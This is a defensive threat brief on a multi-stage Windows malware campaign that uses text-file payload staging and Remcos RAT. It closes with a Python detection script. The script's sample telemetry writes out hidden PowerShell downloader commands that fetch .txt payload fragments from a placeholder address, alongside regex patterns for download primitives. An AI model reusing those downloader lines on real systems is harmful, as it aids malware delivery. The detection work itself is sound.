A multi-stage Windows malware campaign tracked as SHADOW#REACTOR uses text-based payloads and a PowerShell downloader. Securonix researchers have identified it as a sophisticated Windows threat employing a multi-stage delivery mechanism. Initial infection occurs when a victim runs an obfuscated Visual Basic Script (typically delivered via social engineering or compromised websites), which then spawns PowerShell processes to retrieve segmented payload fragments from a remote host. These fragments are stored as plain text files (e.g., .txt) to evade traditional binary detection and are later reconstructed in memory using reflective loading techniques linked to Remcos RAT. This layered approach complicates detection and enables persistent remote access.
Who is affected
Windows systems where users execute untrusted scripts are at direct risk of SHADOW#REACTOR infection and subsequent installation of remote access tools; enterprise environments relying on endpoint defenses may face undetected in-memory threats.
Why CISOs should care
This campaign highlights increasing threat actor sophistication in using living-off-the-land tools and text-based staging to bypass detection, emphasizing the need for advanced behavioral monitoring and script control to mitigate in-memory malware threats.
3 practical actions
- Control script execution: Restrict execution of scripts from untrusted sources and enforce application control policies.
- Enhance behavioral detection: Deploy endpoint detection capable of identifying anomalous PowerShell and in-memory activity.
- Educate users on phishing risks: Train staff to recognize and avoid executing suspicious attachments or links.
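The delivery chain described above (script host spawning PowerShell, PowerShell pulling .txt fragments from a remote host) maps directly onto the second action, behavioral detection. The following is an added, hypothetical example and not Securonix's or any vendor's code: it runs three detection rules over constructed Sysmon Event ID 1 (process creation) style records. The computer name, PIDs, file paths and the 198.51.100.7 address (TEST-NET-2) are made up for the example.

```python
"""Detection logic for the SHADOW#REACTOR-style delivery chain described above.

Added example (hypothetical; not Securonix's or any vendor's code). It scans
constructed Sysmon Event ID 1 (process creation) style records for:
  1. a Windows script host (wscript/cscript) spawning PowerShell,
  2. PowerShell retrieving plain-text (.txt) files from a remote host, and
  3. several such .txt fetches from one remote host in a short window,
     i.e. segmented payload staging.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download primitives that appear in PowerShell stagers (public detection indicators).
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-RestMethod|\birm\b",
    re.IGNORECASE,
)
# URL whose path ends in .txt; group 1 captures the remote host.
TXT_URL_RE = re.compile(r"https?://([^/\s'\"]+)[^\s'\"]*?\.txt\b", re.IGNORECASE)

# Constructed sample telemetry; hostname, PIDs, paths and the 198.51.100.7
# address (TEST-NET-2) are made up for this example.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-05-01T12:00:01", "Computer": "WS-FIN-07", "ProcessId": 4120,
     "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" C:\Users\jdoe\Downloads\invoice.vbs'},
    {"UtcTime": "2024-05-01T12:00:05", "Computer": "WS-FIN-07", "ProcessId": 4188,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://198.51.100.7/p/part1.txt')\""},
    {"UtcTime": "2024-05-01T12:00:07", "Computer": "WS-FIN-07", "ProcessId": 4190,
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://198.51.100.7/p/part2.txt')\""},
    {"UtcTime": "2024-05-01T12:03:00", "Computer": "WS-FIN-07", "ProcessId": 4301,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Reports"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events, window=timedelta(minutes=5), min_fragments=2):
    """Return a list of findings; each is a dict with 'rule', 'computer', 'pid', 'detail'."""
    findings = []
    txt_fetches = defaultdict(list)  # (computer, remote host) -> [timestamps]

    for ev in events:
        parent, image = basename(ev["ParentImage"]), basename(ev["Image"])
        ts = datetime.fromisoformat(ev["UtcTime"])
        cmd = ev["CommandLine"]

        # Rule 1: VBScript/JScript host launching PowerShell (the stage-1 to stage-2 hop).
        if parent in SCRIPT_HOSTS and image in POWERSHELL:
            findings.append({"rule": "script_host_spawns_powershell", "computer": ev["Computer"],
                             "pid": ev["ProcessId"], "detail": f"{parent} -> {image}"})

        # Rule 2: PowerShell using a download primitive to fetch a .txt resource.
        if image in POWERSHELL and DOWNLOAD_RE.search(cmd):
            for m in TXT_URL_RE.finditer(cmd):
                remote = m.group(1).lower()
                findings.append({"rule": "powershell_fetches_txt", "computer": ev["Computer"],
                                 "pid": ev["ProcessId"], "detail": m.group(0)})
                txt_fetches[(ev["Computer"], remote)].append(ts)

    # Rule 3: repeated .txt fetches from the same remote host inside the window,
    # the pattern of fragments being pulled piece by piece for in-memory reassembly.
    for (computer, remote), times in txt_fetches.items():
        times.sort()
        for i, start in enumerate(times):
            in_window = [t for t in times[i:] if t - start <= window]
            if len(in_window) >= min_fragments:
                findings.append({"rule": "segmented_txt_staging", "computer": computer, "pid": None,
                                 "detail": f"{len(in_window)} .txt fetches from {remote} within {window}"})
                break
    return findings


def rule_counts(findings):
    """Number of findings per rule name, for quick triage."""
    counts = defaultdict(int)
    for f in findings:
        counts[f["rule"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['computer']} pid={f['pid']} {f['detail']}")
```

On the sample telemetry the benign explorer-launched PowerShell (a plain Get-ChildItem) produces no finding, while the wscript-spawned downloader triggers rule 1, its two .txt retrievals trigger rule 2, and the pair of fetches from one host inside five minutes triggers rule 3. Rule 3 is the one worth tuning in a real environment: a single .txt download is common and low-signal, but several from the same host in quick succession, launched from a script host, is the staging pattern the campaign relies on.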
